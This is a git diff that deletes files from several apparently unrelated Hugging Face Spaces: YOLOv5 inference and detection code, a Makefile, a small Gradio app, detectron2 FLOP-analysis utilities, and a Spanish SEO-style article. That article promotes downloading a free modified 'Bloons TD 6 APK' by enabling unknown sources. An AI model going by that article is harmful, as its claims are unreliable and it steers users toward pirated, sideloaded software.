experimental_delegates=[load_delegate(delegate)]) - else: # TFLite - LOGGER.info(f'Loading {w} for TensorFlow Lite inference...') - interpreter = Interpreter(model_path=w) # load TFLite model - interpreter.allocate_tensors() # allocate - input_details = interpreter.get_input_details() # inputs - output_details = interpreter.get_output_details() # outputs - # load metadata - with contextlib.suppress(zipfile.BadZipFile): - with zipfile.ZipFile(w, "r") as model: - meta_file = model.namelist()[0] - meta = ast.literal_eval(model.read(meta_file).decode("utf-8")) - stride, names = int(meta['stride']), meta['names'] - elif tfjs: # TF.js - raise NotImplementedError('ERROR: YOLOv5 TF.js inference is not supported') - elif paddle: # PaddlePaddle - LOGGER.info(f'Loading {w} for PaddlePaddle inference...') - check_requirements('paddlepaddle-gpu' if cuda else 'paddlepaddle') - import paddle.inference as pdi - if not Path(w).is_file(): # if not *.pdmodel - w = next(Path(w).rglob('*.pdmodel')) # get *.pdmodel file from *_paddle_model dir - weights = Path(w).with_suffix('.pdiparams') - config = pdi.Config(str(w), str(weights)) - if cuda: - config.enable_use_gpu(memory_pool_init_size_mb=2048, device_id=0) - predictor = pdi.create_predictor(config) - input_handle = predictor.get_input_handle(predictor.get_input_names()[0]) - output_names = predictor.get_output_names() - elif triton: # NVIDIA Triton Inference Server - LOGGER.info(f'Using {w} as Triton Inference Server...') - check_requirements('tritonclient[all]') - from utils.triton import TritonRemoteModel - model = TritonRemoteModel(url=w) - nhwc = model.runtime.startswith("tensorflow") - else: - raise NotImplementedError(f'ERROR: {w} is not a supported format') - - # class names - if 'names' not in locals(): - names = yaml_load(data)['names'] if data else {i: f'class{i}' for i in range(999)} - if names[0] == 'n01440764' and len(names) == 1000: # ImageNet - names = yaml_load(ROOT / 'data/ImageNet.yaml')['names'] # human-readable names - - self.__dict__.update(locals()) # assign all variables to self - - def forward(self, im, augment=False, visualize=False): - # YOLOv5 MultiBackend inference - b, ch, h, w = im.shape # batch, channel, height, width - if self.fp16 and im.dtype != torch.float16: - im = im.half() # to FP16 - if self.nhwc: - im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) - - if self.pt: # PyTorch - y = self.model(im, augment=augment, visualize=visualize) if augment or visualize else self.model(im) - elif self.jit: # TorchScript - y = self.model(im) - elif self.dnn: # ONNX OpenCV DNN - im = im.cpu().numpy() # torch to numpy - self.net.setInput(im) - y = self.net.forward() - elif self.onnx: # ONNX Runtime - im = im.cpu().numpy() # torch to numpy - y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) - elif self.xml: # OpenVINO - im = im.cpu().numpy() # FP32 - y = list(self.executable_network([im]).values()) - elif self.engine: # TensorRT - if self.dynamic and im.shape != self.bindings['images'].shape: - i = self.model.get_binding_index('images') - self.context.set_binding_shape(i, im.shape) # reshape if dynamic - self.bindings['images'] = self.bindings['images']._replace(shape=im.shape) - for name in self.output_names: - i = self.model.get_binding_index(name) - self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) - s = self.bindings['images'].shape - assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" - self.binding_addrs['images'] = int(im.data_ptr()) - self.context.execute_v2(list(self.binding_addrs.values())) - y = [self.bindings[x].data for x in sorted(self.output_names)] - elif self.coreml: # CoreML - im = im.cpu().numpy() - im = Image.fromarray((im[0] * 255).astype('uint8')) - # im = im.resize((192, 320), Image.ANTIALIAS) - y = self.model.predict({'image': im}) # coordinates are xywh normalized - if 'confidence' in y: - box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels - conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float) - y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) - else: - y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) - elif self.paddle: # PaddlePaddle - im = im.cpu().numpy().astype(np.float32) - self.input_handle.copy_from_cpu(im) - self.predictor.run() - y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] - elif self.triton: # NVIDIA Triton Inference Server - y = self.model(im) - else: # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) - im = im.cpu().numpy() - if self.saved_model: # SavedModel - y = self.model(im, training=False) if self.keras else self.model(im) - elif self.pb: # GraphDef - y = self.frozen_func(x=self.tf.constant(im)) - else: # Lite or Edge TPU - input = self.input_details[0] - int8 = input['dtype'] == np.uint8 # is TFLite quantized uint8 model - if int8: - scale, zero_point = input['quantization'] - im = (im / scale + zero_point).astype(np.uint8) # de-scale - self.interpreter.set_tensor(input['index'], im) - self.interpreter.invoke() - y = [] - for output in self.output_details: - x = self.interpreter.get_tensor(output['index']) - if int8: - scale, zero_point = output['quantization'] - x = (x.astype(np.float32) - zero_point) * scale # re-scale - y.append(x) - y = [x if isinstance(x, np.ndarray) else x.numpy() for x in y] - y[0][..., :4] *= [w, h, w, h] # xywh normalized to pixels - - if isinstance(y, (list, tuple)): - return self.from_numpy(y[0]) if len(y) == 1 else [self.from_numpy(x) for x in y] - else: - return self.from_numpy(y) - - def from_numpy(self, x): - return torch.from_numpy(x).to(self.device) if isinstance(x, np.ndarray) else x - - def warmup(self, imgsz=(1, 3, 640, 640)): - # Warmup model by running inference once - warmup_types = self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb, self.triton - if any(warmup_types) and (self.device.type != 'cpu' or self.triton): - im = torch.empty(*imgsz, dtype=torch.half if self.fp16 else torch.float, device=self.device) # input - for _ in range(2 if self.jit else 1): # - self.forward(im) # warmup - - @staticmethod - def _model_type(p='path/to/model.pt'): - # Return model type from model path, i.e. path='path/to/model.onnx' -> type=onnx - # types = [pt, jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs, paddle] - from export import export_formats - from utils.downloads import is_url - sf = list(export_formats().Suffix) # export suffixes - if not is_url(p, check=False): - check_suffix(p, sf) # checks - url = urlparse(p) # if url may be Triton inference server - types = [s in Path(p).name for s in sf] - types[8] &= not types[9] # tflite &= not edgetpu - triton = not any(types) and all([any(s in url.scheme for s in ["http", "grpc"]), url.netloc]) - return types + [triton] - - @staticmethod - def _load_metadata(f=Path('path/to/meta.yaml')): - # Load metadata from meta.yaml if it exists - if f.exists(): - d = yaml_load(f) - return d['stride'], d['names'] # assign stride, names - return None, None - - -class AutoShape(nn.Module): - # YOLOv5 input-robust model wrapper for passing cv2/np/PIL/torch inputs. Includes preprocessing, inference and NMS - conf = 0.25 # NMS confidence threshold - iou = 0.45 # NMS IoU threshold - agnostic = False # NMS class-agnostic - multi_label = False # NMS multiple labels per box - classes = None # (optional list) filter by class, i.e. = [0, 15, 16] for COCO persons, cats and dogs - max_det = 1000 # maximum number of detections per image - amp = False # Automatic Mixed Precision (AMP) inference - - def __init__(self, model, verbose=True): - super().__init__() - if verbose: - LOGGER.info('Adding AutoShape... ') - copy_attr(self, model, include=('yaml', 'nc', 'hyp', 'names', 'stride', 'abc'), exclude=()) # copy attributes - self.dmb = isinstance(model, DetectMultiBackend) # DetectMultiBackend() instance - self.pt = not self.dmb or model.pt # PyTorch model - self.model = model.eval() - if self.pt: - m = self.model.model.model[-1] if self.dmb else self.model.model[-1] # Detect() - m.inplace = False # Detect.inplace=False for safe multithread inference - m.export = True # do not output loss values - - def _apply(self, fn): - # Apply to(), cpu(), cuda(), half() to model tensors that are not parameters or registered buffers - self = super()._apply(fn) - if self.pt: - m = self.model.model.model[-1] if self.dmb else self.model.model[-1] # Detect() - m.stride = fn(m.stride) - m.grid = list(map(fn, m.grid)) - if isinstance(m.anchor_grid, list): - m.anchor_grid = list(map(fn, m.anchor_grid)) - return self - - @smart_inference_mode() - def forward(self, ims, size=640, augment=False, profile=False): - # Inference from various sources. For size(height=640, width=1280), RGB images example inputs are: - # file: ims = 'data/images/zidane.jpg' # str or PosixPath - # URI: = 'https://ultralytics.com/images/zidane.jpg' - # OpenCV: = cv2.imread('image.jpg')[:,:,::-1] # HWC BGR to RGB x(640,1280,3) - # PIL: = Image.open('image.jpg') or ImageGrab.grab() # HWC x(640,1280,3) - # numpy: = np.zeros((640,1280,3)) # HWC - # torch: = torch.zeros(16,3,320,640) # BCHW (scaled to size=640, 0-1 values) - # multiple: = [Image.open('image1.jpg'), Image.open('image2.jpg'), ...] # list of images - - dt = (Profile(), Profile(), Profile()) - with dt[0]: - if isinstance(size, int): # expand - size = (size, size) - p = next(self.model.parameters()) if self.pt else torch.empty(1, device=self.model.device) # param - autocast = self.amp and (p.device.type != 'cpu') # Automatic Mixed Precision (AMP) inference - if isinstance(ims, torch.Tensor): # torch - with amp.autocast(autocast): - return self.model(ims.to(p.device).type_as(p), augment=augment) # inference - - # Pre-process - n, ims = (len(ims), list(ims)) if isinstance(ims, (list, tuple)) else (1, [ims]) # number, list of images - shape0, shape1, files = [], [], [] # image and inference shapes, filenames - for i, im in enumerate(ims): - f = f'image{i}' # filename - if isinstance(im, (str, Path)): # filename or uri - im, f = Image.open(requests.get(im, stream=True).raw if str(im).startswith('http') else im), im - im = np.asarray(exif_transpose(im)) - elif isinstance(im, Image.Image): # PIL Image - im, f = np.asarray(exif_transpose(im)), getattr(im, 'filename', f) or f - files.append(Path(f).with_suffix('.jpg').name) - if im.shape[0] < 5: # image in CHW - im = im.transpose((1, 2, 0)) # reverse dataloader .transpose(2, 0, 1) - im = im[..., :3] if im.ndim == 3 else cv2.cvtColor(im, cv2.COLOR_GRAY2BGR) # enforce 3ch input - s = im.shape[:2] # HWC - shape0.append(s) # image shape - g = max(size) / max(s) # gain - shape1.append([int(y * g) for y in s]) - ims[i] = im if im.data.contiguous else np.ascontiguousarray(im) # update - shape1 = [make_divisible(x, self.stride) for x in np.array(shape1).max(0)] if self.pt else size # inf shape - x = [letterbox(im, shape1, auto=False)[0] for im in ims] # pad - x = np.ascontiguousarray(np.array(x).transpose((0, 3, 1, 2))) # stack and BHWC to BCHW - x = torch.from_numpy(x).to(p.device).type_as(p) / 255 # uint8 to fp16/32 - - with amp.autocast(autocast): - # Inference - with dt[1]: - y = self.model(x, augment=augment) # forward - - # Post-process - with dt[2]: - y = non_max_suppression(y if self.dmb else y[0], - self.conf, - self.iou, - self.classes, - self.agnostic, - self.multi_label, - max_det=self.max_det) # NMS - for i in range(n): - scale_boxes(shape1, y[i][:, :4], shape0[i]) - - return Detections(ims, y, files, dt, self.names, x.shape) - - -class Detections: - # YOLOv5 detections class for inference results - def __init__(self, ims, pred, files, times=(0, 0, 0), names=None, shape=None): - super().__init__() - d = pred[0].device # device - gn = [torch.tensor([*(im.shape[i] for i in [1, 0, 1, 0]), 1, 1], device=d) for im in ims] # normalizations - self.ims = ims # list of images as numpy arrays - self.pred = pred # list of tensors pred[0] = (xyxy, conf, cls) - self.names = names # class names - self.files = files # image filenames - self.times = times # profiling times - self.xyxy = pred # xyxy pixels - self.xywh = [xyxy2xywh(x) for x in pred] # xywh pixels - self.xyxyn = [x / g for x, g in zip(self.xyxy, gn)] # xyxy normalized - self.xywhn = [x / g for x, g in zip(self.xywh, gn)] # xywh normalized - self.n = len(self.pred) # number of images (batch size) - self.t = tuple(x.t / self.n * 1E3 for x in times) # timestamps (ms) - self.s = tuple(shape) # inference BCHW shape - - def _run(self, pprint=False, show=False, save=False, crop=False, render=False, labels=True, save_dir=Path('')): - s, crops = '', [] - for i, (im, pred) in enumerate(zip(self.ims, self.pred)): - s += f'\nimage {i + 1}/{len(self.pred)}: {im.shape[0]}x{im.shape[1]} ' # string - if pred.shape[0]: - for c in pred[:, -1].unique(): - n = (pred[:, -1] == c).sum() # detections per class - s += f"{n} {self.names[int(c)]}{'s' * (n > 1)}, " # add to string - s = s.rstrip(', ') - if show or save or render or crop: - annotator = Annotator(im, example=str(self.names)) - for *box, conf, cls in reversed(pred): # xyxy, confidence, class - label = f'{self.names[int(cls)]} {conf:.2f}' - if crop: - file = save_dir / 'crops' / self.names[int(cls)] / self.files[i] if save else None - crops.append({ - 'box': box, - 'conf': conf, - 'cls': cls, - 'label': label, - 'im': save_one_box(box, im, file=file, save=save)}) - else: # all others - annotator.box_label(box, label if labels else '', color=colors(cls)) - im = annotator.im - else: - s += '(no detections)' - - im = Image.fromarray(im.astype(np.uint8)) if isinstance(im, np.ndarray) else im # from np - if show: - display(im) if is_notebook() else im.show(self.files[i]) - if save: - f = self.files[i] - im.save(save_dir / f) # save - if i == self.n - 1: - LOGGER.info(f"Saved {self.n} image{'s' * (self.n > 1)} to {colorstr('bold', save_dir)}") - if render: - self.ims[i] = np.asarray(im) - if pprint: - s = s.lstrip('\n') - return f'{s}\nSpeed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {self.s}' % self.t - if crop: - if save: - LOGGER.info(f'Saved results to {save_dir}\n') - return crops - - @TryExcept('Showing images is not supported in this environment') - def show(self, labels=True): - self._run(show=True, labels=labels) # show results - - def save(self, labels=True, save_dir='runs/detect/exp', exist_ok=False): - save_dir = increment_path(save_dir, exist_ok, mkdir=True) # increment save_dir - self._run(save=True, labels=labels, save_dir=save_dir) # save results - - def crop(self, save=True, save_dir='runs/detect/exp', exist_ok=False): - save_dir = increment_path(save_dir, exist_ok, mkdir=True) if save else None - return self._run(crop=True, save=save, save_dir=save_dir) # crop results - - def render(self, labels=True): - self._run(render=True, labels=labels) # render results - return self.ims - - def pandas(self): - # return detections as pandas DataFrames, i.e. print(results.pandas().xyxy[0]) - new = copy(self) # return copy - ca = 'xmin', 'ymin', 'xmax', 'ymax', 'confidence', 'class', 'name' # xyxy columns - cb = 'xcenter', 'ycenter', 'width', 'height', 'confidence', 'class', 'name' # xywh columns - for k, c in zip(['xyxy', 'xyxyn', 'xywh', 'xywhn'], [ca, ca, cb, cb]): - a = [[x[:5] + [int(x[5]), self.names[int(x[5])]] for x in x.tolist()] for x in getattr(self, k)] # update - setattr(new, k, [pd.DataFrame(x, columns=c) for x in a]) - return new - - def tolist(self): - # return a list of Detections objects, i.e. 'for result in results.tolist():' - r = range(self.n) # iterable - x = [Detections([self.ims[i]], [self.pred[i]], [self.files[i]], self.times, self.names, self.s) for i in r] - # for d in x: - # for k in ['ims', 'pred', 'xyxy', 'xyxyn', 'xywh', 'xywhn']: - # setattr(d, k, getattr(d, k)[0]) # pop out of list - return x - - def print(self): - LOGGER.info(self.__str__()) - - def __len__(self): # override len(results) - return self.n - - def __str__(self): # override print(results) - return self._run(pprint=True) # print results - - def __repr__(self): - return f'YOLOv5 {self.__class__} instance\n' + self.__str__() - - -class Proto(nn.Module): - # YOLOv5 mask Proto module for segmentation models - def __init__(self, c1, c_=256, c2=32): # ch_in, number of protos, number of masks - super().__init__() - self.cv1 = Conv(c1, c_, k=3) - self.upsample = nn.Upsample(scale_factor=2, mode='nearest') - self.cv2 = Conv(c_, c_, k=3) - self.cv3 = Conv(c_, c2) - - def forward(self, x): - return self.cv3(self.cv2(self.upsample(self.cv1(x)))) - - -class Classify(nn.Module): - # YOLOv5 classification head, i.e. x(b,c1,20,20) to x(b,c2) - def __init__(self, c1, c2, k=1, s=1, p=None, g=1): # ch_in, ch_out, kernel, stride, padding, groups - super().__init__() - c_ = 1280 # efficientnet_b0 size - self.conv = Conv(c1, c_, k, s, autopad(k, p), g) - self.pool = nn.AdaptiveAvgPool2d(1) # to x(b,c_,1,1) - self.drop = nn.Dropout(p=0.0, inplace=True) - self.linear = nn.Linear(c_, c2) # to x(b,c2) - - def forward(self, x): - if isinstance(x, list): - x = torch.cat(x, 1) - return self.linear(self.drop(self.pool(self.conv(x)).flatten(1))) diff --git a/spaces/Arnx/MusicGenXvAKN/Makefile b/spaces/Arnx/MusicGenXvAKN/Makefile deleted file mode 100644 index 5bfd89dd833d7448b21073eb6ee7cfac1d5157dd..0000000000000000000000000000000000000000 --- a/spaces/Arnx/MusicGenXvAKN/Makefile +++ /dev/null @@ -1,21 +0,0 @@ -default: linter tests - -install: - pip install -U pip - pip install -U -e '.[dev]' - -linter: - flake8 audiocraft && mypy audiocraft - flake8 tests && mypy tests - -tests: - coverage run -m pytest tests - coverage report --include 'audiocraft/*' - -docs: - pdoc3 --html -o docs -f audiocraft - -dist: - python setup.py sdist - -.PHONY: linter tests docs dist diff --git a/spaces/Augustya/ai-subject-answer-generator/app.py b/spaces/Augustya/ai-subject-answer-generator/app.py deleted file mode 100644 index 5108a2ab5869bbd681434a5d5fecfe4f89872b4a..0000000000000000000000000000000000000000 --- a/spaces/Augustya/ai-subject-answer-generator/app.py +++ /dev/null @@ -1,7 +0,0 @@ -import gradio as gr -import os - -hf_token = os.environ['GRADIO_API_KEY'] - -iface = gr.load(name="Augustya/ai-email-subject-question-answering-generator", hf_token=hf_token, src="spaces") -iface.queue(api_open=False).launch(show_api=False) \ No newline at end of file diff --git a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/analysis.py b/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/analysis.py deleted file mode 100644 index 178da7968cc08c29ec61b823bba8b74e8d97e1d6..0000000000000000000000000000000000000000 --- a/spaces/Awiny/Image2Paragraph/models/grit_src/third_party/CenterNet2/detectron2/utils/analysis.py +++ /dev/null @@ -1,188 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -*- coding: utf-8 -*- - -import typing -from typing import Any, List -import fvcore -from fvcore.nn import activation_count, flop_count, parameter_count, parameter_count_table -from torch import nn - -from detectron2.export import TracingAdapter - -__all__ = [ - "activation_count_operators", - "flop_count_operators", - "parameter_count_table", - "parameter_count", - "FlopCountAnalysis", -] - -FLOPS_MODE = "flops" -ACTIVATIONS_MODE = "activations" - - -# Some extra ops to ignore from counting, including elementwise and reduction ops -_IGNORED_OPS = { - "aten::add", - "aten::add_", - "aten::argmax", - "aten::argsort", - "aten::batch_norm", - "aten::constant_pad_nd", - "aten::div", - "aten::div_", - "aten::exp", - "aten::log2", - "aten::max_pool2d", - "aten::meshgrid", - "aten::mul", - "aten::mul_", - "aten::neg", - "aten::nonzero_numpy", - "aten::reciprocal", - "aten::repeat_interleave", - "aten::rsub", - "aten::sigmoid", - "aten::sigmoid_", - "aten::softmax", - "aten::sort", - "aten::sqrt", - "aten::sub", - "torchvision::nms", # TODO estimate flop for nms -} - - -class FlopCountAnalysis(fvcore.nn.FlopCountAnalysis): - """ - Same as :class:`fvcore.nn.FlopCountAnalysis`, but supports detectron2 models. - """ - - def __init__(self, model, inputs): - """ - Args: - model (nn.Module): - inputs (Any): inputs of the given model. Does not have to be tuple of tensors. - """ - wrapper = TracingAdapter(model, inputs, allow_non_tensor=True) - super().__init__(wrapper, wrapper.flattened_inputs) - self.set_op_handle(**{k: None for k in _IGNORED_OPS}) - - -def flop_count_operators(model: nn.Module, inputs: list) -> typing.DefaultDict[str, float]: - """ - Implement operator-level flops counting using jit. - This is a wrapper of :func:`fvcore.nn.flop_count` and adds supports for standard - detection models in detectron2. - Please use :class:`FlopCountAnalysis` for more advanced functionalities. - - Note: - The function runs the input through the model to compute flops. - The flops of a detection model is often input-dependent, for example, - the flops of box & mask head depends on the number of proposals & - the number of detected objects. - Therefore, the flops counting using a single input may not accurately - reflect the computation cost of a model. It's recommended to average - across a number of inputs. - - Args: - model: a detectron2 model that takes `list[dict]` as input. - inputs (list[dict]): inputs to model, in detectron2's standard format. - Only "image" key will be used. - supported_ops (dict[str, Handle]): see documentation of :func:`fvcore.nn.flop_count` - - Returns: - Counter: Gflop count per operator - """ - old_train = model.training - model.eval() - ret = FlopCountAnalysis(model, inputs).by_operator() - model.train(old_train) - return {k: v / 1e9 for k, v in ret.items()} - - -def activation_count_operators( - model: nn.Module, inputs: list, **kwargs -) -> typing.DefaultDict[str, float]: - """ - Implement operator-level activations counting using jit. - This is a wrapper of fvcore.nn.activation_count, that supports standard detection models - in detectron2. - - Note: - The function runs the input through the model to compute activations. - The activations of a detection model is often input-dependent, for example, - the activations of box & mask head depends on the number of proposals & - the number of detected objects. - - Args: - model: a detectron2 model that takes `list[dict]` as input. - inputs (list[dict]): inputs to model, in detectron2's standard format. - Only "image" key will be used. - - Returns: - Counter: activation count per operator - """ - return _wrapper_count_operators(model=model, inputs=inputs, mode=ACTIVATIONS_MODE, **kwargs) - - -def _wrapper_count_operators( - model: nn.Module, inputs: list, mode: str, **kwargs -) -> typing.DefaultDict[str, float]: - # ignore some ops - supported_ops = {k: lambda *args, **kwargs: {} for k in _IGNORED_OPS} - supported_ops.update(kwargs.pop("supported_ops", {})) - kwargs["supported_ops"] = supported_ops - - assert len(inputs) == 1, "Please use batch size=1" - tensor_input = inputs[0]["image"] - inputs = [{"image": tensor_input}] # remove other keys, in case there are any - - old_train = model.training - if isinstance(model, (nn.parallel.distributed.DistributedDataParallel, nn.DataParallel)): - model = model.module - wrapper = TracingAdapter(model, inputs) - wrapper.eval() - if mode == FLOPS_MODE: - ret = flop_count(wrapper, (tensor_input,), **kwargs) - elif mode == ACTIVATIONS_MODE: - ret = activation_count(wrapper, (tensor_input,), **kwargs) - else: - raise NotImplementedError("Count for mode {} is not supported yet.".format(mode)) - # compatible with change in fvcore - if isinstance(ret, tuple): - ret = ret[0] - model.train(old_train) - return ret - - -def find_unused_parameters(model: nn.Module, inputs: Any) -> List[str]: - """ - Given a model, find parameters that do not contribute - to the loss. - - Args: - model: a model in training mode that returns losses - inputs: argument or a tuple of arguments. Inputs of the model - - Returns: - list[str]: the name of unused parameters - """ - assert model.training - for _, prm in model.named_parameters(): - prm.grad = None - - if isinstance(inputs, tuple): - losses = model(*inputs) - else: - losses = model(inputs) - - if isinstance(losses, dict): - losses = sum(losses.values()) - losses.backward() - - unused: List[str] = [] - for name, prm in model.named_parameters(): - if prm.grad is None: - unused.append(name) - prm.grad = None - return unused diff --git a/spaces/Benson/text-generation/Examples/Bloons Td 6 Apk Download Android.md b/spaces/Benson/text-generation/Examples/Bloons Td 6 Apk Download Android.md deleted file mode 100644 index 2a10f8f48e8c7c6a4b1b002282323620997cac6d..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Bloons Td 6 Apk Download Android.md +++ /dev/null @@ -1,49 +0,0 @@ - -

    Bloons TD 6 APK Descargar Android: Cómo instalar y jugar el mejor juego de defensa de la torre

    -

    Si eres un fan de los juegos de defensa de torres, probablemente hayas oído hablar de Bloons TD, una de las series más populares y exitosas del género. La última entrega, Bloons TD 6, es una obra maestra de los juegos de estrategia que te mantendrá enganchado durante horas.

    -

    Bloons TD 6 es un juego en el que tienes que crear tu defensa perfecta a partir de una combinación de poderosas torres de monos y héroes impresionantes, y luego hacer estallar cada última bloon invasor. Puedes elegir entre docenas de mapas, modos, desafíos y personalizaciones para crear tu propia experiencia única.

    -

    bloons td 6 apk download android


    DOWNLOADhttps://bltlly.com/2v6JFG



    -

    Pero ¿qué pasa si quieres jugar Bloons TD 6 en tu dispositivo Android sin pagar por él? Bueno, hay una manera de hacer eso. Puedes descargar e instalar Bloons TD 6 APK, que es una versión modificada del juego que te permite disfrutarlo gratis.

    -

    En este artículo, le mostraremos cómo descargar e instalar Bloons TD 6 APK en su dispositivo Android, así como algunos consejos y trucos para jugar el juego. ¡Vamos a empezar!

    -

    Características de Bloons TD 6 APK Descargar Android

    -

    Bloons TD 6 APK no es solo un juego de torre de defensa simple. Es un juego rico y diverso que ofrece un montón de características y contenido para que usted explore. Estas son algunas de las principales características de Bloons TD 6 APK descargar Android:

    -
      -
    • Contenido enorme: Bloons TD 6 APK se actualiza constantemente con nuevas características y contenido para mantenerlo entretenido. Puedes participar en eventos de jefes, odisea, territorio disputado, misiones, tienda de trofeos y navegador de contenido. También puedes crear tus propios mapas, modos y desafíos y compartirlos con otros jugadores.
    • - -
    • Awesomeness sin fin: Bloons TD 6 APK tiene modo cooperativo para 4 jugadores, donde puede formar equipo con tus amigos o extraños y pop bloons juntos. También puedes jugar en modo offline, donde podrás disfrutar del juego sin conexión a Internet. Bloons TD 6 APK tiene 68 mapas, que van desde la dificultad fácil a experto, así como el conocimiento del mono, poderes, y monos insta para ayudarle en sus batallas.
    • -
    -

    Cómo descargar e instalar Bloons TD 6 APK en Android

    -

    Descargar e instalar Bloons TD 6 APK en su dispositivo Android es fácil y rápido. Solo tienes que seguir estos sencillos pasos:

    -
      -
    1. Habilitar fuentes desconocidas en el dispositivo: Para instalar Bloons TD 6 APK, es necesario permitir que el dispositivo para instalar aplicaciones de fuentes desconocidas. Para hacer esto, vaya a la configuración del dispositivo, luego la seguridad o la privacidad, luego habilite fuentes desconocidas o permita la instalación de aplicaciones de fuentes desconocidas.
    2. -
    3. Descargar el archivo Bloons TD 6 APK de una fuente de confianza: Hay muchos sitios web que ofrecen Bloons TD 6 APK descarga gratuita, pero no todos ellos son seguros y fiables. Algunos de ellos pueden contener virus o malware que pueden dañar su dispositivo o robar sus datos. Para evitar esto, usted debe descargar el archivo APK Bloons TD 6 de una fuente de confianza, como [este].
    4. -
    5. Localizar e instalar el archivo APK en su dispositivo: Después de descargar el archivo APK Bloons TD 6, es necesario ubicarlo en el almacenamiento de su dispositivo. Puedes usar una aplicación de administrador de archivos o el explorador de archivos integrado de tu dispositivo para encontrar el archivo. Una vez que lo encuentre, toque en él y siga las instrucciones para instalarlo en su dispositivo.
    6. -
    7. Iniciar el juego y disfrutar: Después de instalar el archivo APK Bloons TD 6 en su dispositivo, puede iniciar el juego tocando en su icono en la pantalla de inicio o cajón de aplicaciones. Ahora puedes disfrutar jugando Bloons TD 6 gratis en tu dispositivo Android.
    8. -
    -

    Consejos y trucos para jugar Bloons TD 6 APK en Android

    - -
      -
    • Elige las torres y héroes de monos adecuados para cada mapa y modo: Diferentes torres de monos y héroes tienen diferentes fortalezas y debilidades. Algunos de ellos son más eficaces contra ciertos tipos de hinchazón o en ciertas situaciones. Por ejemplo, los monos dardos son buenos para el poder de estallido del juego temprano, pero luchan contra los bloons de camuflaje. Los monos francotiradores son buenos para disparar a larga distancia, pero tienen una cadencia de fuego lenta. Quincy es un héroe versátil que puede hacer estallar la mayoría de los tipos de bloons, pero no es muy poderoso contra bloons de clase MOAB. Debes elegir las torres de monos y los héroes que se adapten al diseño del mapa, los tipos de bloon y el modo de juego al que estás jugando.
    • -
    • Usa las habilidades activadas sabiamente y en el momento adecuado: Algunas torres de monos y héroes tienen habilidades activadas que pueden darte una ventaja en el juego. Por ejemplo, la habilidad de terror tecno de súper mono puede destruir todos los bloons en la pantalla, mientras que la habilidad de tormenta de fuego de gwendolin puede incendiar todos los bloons por un corto tiempo. Sin embargo, estas habilidades tienen tiempos de reutilización y costos, por lo que debes usarlas sabiamente y en el momento adecuado. Usted debe guardarlos para cuando usted se enfrenta a una ola dura de bloons o cuando usted necesita un impulso de poder de estallido.
    • -
    • Actualiza tu conocimiento de mono y desbloquea nuevas ventajas: Conocimiento de mono es un sistema que te permite desbloquear nuevas ventajas para tus torres de mono y héroes. Puedes ganar puntos de conocimiento del mono subiendo de nivel en el juego o completando ciertos logros. Puedes gastar estos puntos en varias ramas del conocimiento del mono, como primaria, militar, magia, apoyo y héroes. Estas ventajas pueden darle varios beneficios, como mayor rango, daño, perforación, velocidad, ingresos y más. Usted debe actualizar su conocimiento del mono y desbloquear las ventajas que se adapten a su estrategia y preferencia.
    • - -
    • Únete a la comunidad y compartir sus creaciones y comentarios: Bloons TD 6 APK tiene una comunidad vibrante y amigable de jugadores que aman el juego y quieren compartir sus experiencias y opiniones. Puedes unirte a la comunidad visitando el sitio web oficial, el subreddit, el servidor de discordia, el canal de YouTube o las páginas de redes sociales del juego. También puede compartir sus creaciones y comentarios con los desarrolladores y otros jugadores a través del navegador de contenido, el chat en el juego o el sistema de calificación y revisión. También puedes apoyar el juego comprando artículos dentro del juego o viendo anuncios.
    • -
    -

    Conclusión

    -

    Bloons TD 6 APK es un fantástico juego de torre de defensa que le mantendrá entretenido durante horas. Tiene muchas características y contenido que lo hacen divertido y desafiante. Puede descargar e instalar Bloons TD 6 APK en su dispositivo Android de forma gratuita siguiendo los pasos que le hemos mostrado en este artículo. También puede utilizar nuestros consejos y trucos para mejorar su juego y divertirse más.

    -

    Entonces, ¿qué estás esperando? Descargar Bloons TD 6 APK ahora y disfrutar de estallar bloons con sus torres de mono y héroes!

    -

    Preguntas frecuentes

    -
      -
    • Q1: ¿Es seguro descargar e instalar Bloons TD 6 APK?
    • -
    • A1: Sí, siempre y cuando lo descargues de una fuente confiable y sigas las instrucciones cuidadosamente.
    • -
    • Q2: ¿Cuánto cuesta Bloons TD 6 APK?
    • -
    • A2: Bloons TD 6 APK es libre de descargar e instalar, pero contiene elementos en el juego que se pueden comprar con dinero real. Puede desactivar las compras en la aplicación en la configuración de su dispositivo.
    • -
    • Q3: ¿Cuáles son los requisitos del sistema para Bloons TD 6 APK?
    • -
    • A3: Bloons TD 6 APK requiere Android versión 5.0 o superior y al menos 2 GB de RAM. También requiere alrededor de 100 MB de espacio de almacenamiento.
    • -
    • Q4: ¿Puedo jugar Bloons TD 6 APK sin conexión?
    • - -
    • Q5: ¿Puedo jugar Bloons TD 6 APK con mis amigos?
    • -
    • A5: Sí, puede jugar Bloons TD 6 APK con hasta otros tres jugadores en modo cooperativo. También puedes unir fuerzas con otros jugadores y luchar por territorio contra otros cinco equipos en el modo de territorio disputado.
    • -

    64aa2da5cf
    -
    -
    \ No newline at end of file diff --git a/spaces/Benson/text-generation/Examples/Creality Ender 3 S1 Pro Cura Perfil Descargar.md b/spaces/Benson/text-generation/Examples/Creality Ender 3 S1 Pro Cura Perfil Descargar.md deleted file mode 100644 index a274b60bc14cafa3ee22ed264ee62477c99cebcd..0000000000000000000000000000000000000000 --- a/spaces/Benson/text-generation/Examples/Creality Ender 3 S1 Pro Cura Perfil Descargar.md +++ /dev/null @@ -1,84 +0,0 @@ - -

